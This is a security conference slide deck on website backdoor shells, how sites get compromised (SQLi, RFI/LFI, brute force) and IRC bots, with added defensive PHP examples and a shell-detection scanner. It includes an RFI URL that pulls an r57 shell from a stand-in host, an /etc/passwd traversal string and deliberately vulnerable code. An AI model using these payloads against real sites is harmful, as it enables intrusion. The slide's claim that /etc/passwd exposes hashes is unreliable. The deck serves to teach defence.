Demystifying Backdoor Shells and IRC Bots: The Risk… By : Jonathan

Posted on 26-Dec-2015

Page 1

Demystifying Backdoor Shells and IRC Bots: The Risk…

By : Jonathan

Page 2

www.rootcon.org

Page 3

Topic Overview

• Backdoor Shells ~ for websites

• How a site gets backdoored

• The Risk of Backdoor Shells

• IRC Bots

• Some Security Tips

Page 4

What’s with this topic?

• Most websites today are hosted on a Linux server. That’s why I came up with this topic.

• Also, regarding IRC bots: most IRC bots are coded in Perl and PHP, and they usually run on Linux servers or ordinary Linux computers.

Page 5

Backdoor Shell

A backdoor shell is a malicious piece of PHP (ASP, JSP, etc.) code that can be uploaded to a site to gain access to the files stored on that site. Once it is uploaded, the hacker can use it to edit, delete, or download any files on the site, or upload their own.

Page 6

How a site gets backdoored

• Through SQLi, or Structured Query Language injection

• Through LFI, or local file inclusion

• Through RFI, or remote file inclusion

• Through sniffing

• Through SSH or FTP cracking (bruteforcing)

• Through social engineering

Page 7

SQLI

• SQL injection is a code injection technique that exploits a security vulnerability in the database layer of an application (typically in how queries are built from user input). It is one of the most common exploits used to obtain the admin’s username and password.
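As an added example that is not part of the slides, here is the admin-login query the bullet refers to, built by string concatenation (vulnerable) beside a PDO prepared-statement version that keeps the query structure fixed. The table and column names are assumptions.

```php
<?php
// Added example (not from the slides). Table/column names are assumptions.

// VULNERABLE: user input becomes part of the SQL text, so a crafted value
// can change the structure of the query instead of being compared as data.
function findAdminVulnerable(PDO $db, string $user, string $pass): ?array
{
    $sql = "SELECT id FROM admins WHERE username = '$user' AND password = '$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// HARDENED: a placeholder keeps the query fixed; the driver sends the value
// separately, so it can only ever be compared as a username. The password is
// stored as a hash and checked in PHP, never interpolated into SQL.
function findAdmin(PDO $db, string $user, string $pass): ?array
{
    $stmt = $db->prepare('SELECT id, password_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['password_hash'])) {
        return null;
    }
    return ['id' => $row['id']];
}

// Hashes for the admins table are created once with password_hash(), e.g.:
//   $hash = password_hash($plaintext, PASSWORD_DEFAULT);
```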

Page 11

RFI and LFI

• Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to make a script on the web server include a file fetched from a remote host.

• Local File Inclusion (LFI) is the same flaw applied to files already on the server: through the web browser, the attacker chooses which local file the script includes.

Page 12

Example Code of RFI

www.example.com/index.php?page=http://www.google.com/

Upload a shell >>> www.example.com/index.php?page=http://www.shellhost.com/r57.txt?

Page 13

Example code of LFI

On a *nix system, this would show the hashes of all passwords on the server, which could later be cracked and used to get file access.

http://example.com/index.php?file=../../../../etc/passwd
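Both of the examples above come from the same coding pattern: a request parameter passed straight to include(). As an added example that is not part of the slides, here is that pattern beside a hardened version that resolves the parameter through an allowlist; the file names and the parameter name are assumptions.

```php
<?php
// Added example (not from the slides): the include pattern behind
// index.php?page=... beside a hardened version. File names and the
// parameter name are assumptions for illustration.

// VULNERABLE: the request parameter reaches include() untouched, so a
// traversal path (LFI) or, with allow_url_include=On, a URL (RFI) is honoured.
function renderPageVulnerable(string $page): void
{
    include $page;
}

// HARDENED: an allowlist maps short names to files shipped with the site;
// anything not in the map is rejected before include() is reached.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolvePage(?string $page): ?string
{
    if ($page === null || !isset(PAGES[$page])) {
        return null;
    }
    $root = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/' . PAGES[$page]);
    // Defence in depth: the resolved file must still sit under pages/.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function renderPage(?string $page): void
{
    $path = resolvePage($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

renderPage($_GET['page'] ?? 'home');
```

Keep allow_url_include=Off in php.ini (its default) so that include() can never fetch a URL even if a parameter does slip through.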

Page 14

Sniffed Passwords

• A website could also be backdoored if a hacker or cracker sniffs the site owner’s login session in a Wi-Fi zone.

Page 15

SSH Cracking or FTP cracking

This can be achieved by bruteforcing port 21 (FTP) or port 22 (SSH); after that the cracker uploads his shell under the public_html folder or the www directory.

Page 17

Social Engineering or SE

• The act of manipulating a person to accomplish goals that may or may not be in the “target’s” best interest. This may include obtaining information, gaining access, or getting the target to take certain action.

Page 18

The Risk

• Your website can be defaced

• The database can be extracted

• The hacker could use your website as a scam page or a phishing site

• Hackers may also use it to bruteforce FTP or cPanel, allowing them more access to the website

Page 19

• Shells can also be used to gain root access to the site.

• Hackers could host their IRC bots on the site

• Hackers could use it for spamming, such as email spamming

• Hackers could host more backdoor shells and spread them across your files

• Hackers could host their denial-of-service (DoS) or distributed denial-of-service (DDoS) attack shells (ex. host booter)
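Because a planted shell tends to be copied across the site’s files, a site owner needs a way to find them. The following audit script is an added example, not part of the slides: it walks a web root such as public_html and reports files that use the functions typical of backdoor shells, including PHP code hidden in non-PHP files. The pattern list and the default directory are assumptions; review hits by hand, since legitimate code also uses some of these calls.

```php
<?php
// Added example (not from the slides): walks a web root and flags files that
// look like backdoor shells. Patterns and the default directory are
// assumptions; the script only reports, it never deletes.

const SUSPICIOUS = [
    '/\beval\s*\(/i',
    '/\b(?:shell_exec|passthru|system|proc_open|popen)\s*\(/i',
    '/\b(?:base64_decode|gzinflate|str_rot13)\s*\(/i',
    '/\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(/i', // $_GET['x']() call
];

function scanFile(string $path): array
{
    $src = @file_get_contents($path);
    if ($src === false) {
        return [];
    }
    $hits = [];
    // PHP code hiding in a .jpg, .txt or .ico is itself a finding.
    if (preg_match('/\.(?:php\d?|phtml)$/i', $path) !== 1) {
        if (strpos($src, '<?php') === false) {
            return [];
        }
        $hits[] = 'php-open-tag-in-non-php-file';
    }
    foreach (SUSPICIOUS as $re) {
        if (preg_match($re, $src) === 1) {
            $hits[] = $re;
        }
    }
    return $hits;
}

function scanWebRoot(string $root): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        if ($f->isFile() && ($hits = scanFile($f->getPathname())) !== []) {
            $findings[$f->getPathname()] = $hits;
        }
    }
    return $findings;
}

foreach (scanWebRoot($argv[1] ?? 'public_html') as $path => $hits) {
    echo $path, ': ', implode(' ', $hits), PHP_EOL;
}
```

Run it from the command line as `php scan.php /path/to/public_html`; comparing its output against a clean copy of the site, or against file modification times, narrows the list quickly.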

Page 22

IRC Bots

• An IRC bot is an independent program that connects to Internet Relay Chat as a client, and so appears to other IRC users as another user. An IRC bot differs from a regular client in that instead of providing interactive access to IRC for a human user, it performs automated functions.

Page 23

• Most IRC bots are coded in PHP, Python and Perl, but the most powerful IRC bot today is coded in Perl.

• Today, IRC bots are not only assigned simple tasks; they also carry out DDoS or DoS attacks, vulnerability scanning, uploading of backdoor shells, and verification of credit card details.

Page 26

Security Tips (Prevention)

• Keep up with the latest security updates and make sure to have a secure admin panel.

• Make sure that the admin panel is hard to find and cannot be scanned for easily. Don’t give the admin panel a common name such as admin.php, admin, admin.asp, controlpanel, etc.

• If the site does have an admin panel with an upload feature, make sure it permits the user to upload only .jpeg, .png, and other image file types.
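Restricting uploads to image types has to be enforced on the server, not in the browser, and by the file’s content rather than its name. As an added example that is not part of the slides, here is a server-side check for such an upload; directory and constant names are assumptions.

```php
<?php
// Added example (not from the slides): server-side validation for an
// admin-panel image upload. Directory and constant names are assumptions.

const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];
const MAX_BYTES = 2 * 1024 * 1024;

// Returns [true, extension] on success or [false, reason] on rejection.
function validateImageUpload(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload failed'];
    }
    if ($file['size'] > MAX_BYTES) {
        return [false, 'file too large'];
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return [false, 'not an uploaded file'];
    }
    // Never trust $file['type'] or $file['name']: sniff the bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        return [false, 'not an allowed image type'];
    }
    // The pixel data must also parse as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        return [false, 'not a valid image'];
    }
    return [true, ALLOWED_TYPES[$mime]];
}

function storeImageUpload(array $file, string $uploadDir): ?string
{
    [$ok, $info] = validateImageUpload($file);
    if (!$ok) {
        return null;
    }
    // Server-chosen name: the client's file name, and any extra extension
    // it carried, never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $info;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    return $name;
}
```

Keep $uploadDir outside public_html, or, if it must be web-reachable, disable PHP execution for it (for example `php_admin_flag engine off` in the Apache directory block).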

Page 27

• Test your website’s security; use Acunetix Web Vulnerability Scanner to scan for loopholes.

• Make sure that your passwords are not easy to guess and are not among the most common words. Use long passwords. Ex. M!67a@l+a?()Ss<&ajka

• Download BotHunter (a network-based botnet diagnostic system) >> http://www.bothunter.net/

• Visit http://www.sevagas.com/ and learn from Emeric Nasi of logera

• Research more… =)

Page 28

Additional Infos

Zone-h.org archived 1,419,203 defaced web sites. Linux became the most used OS for web servers and, of course, the preferred target for defacers. Why? Because of certain benefits and the many things a defacer or a cracker could play around with.

Page 29

Questions?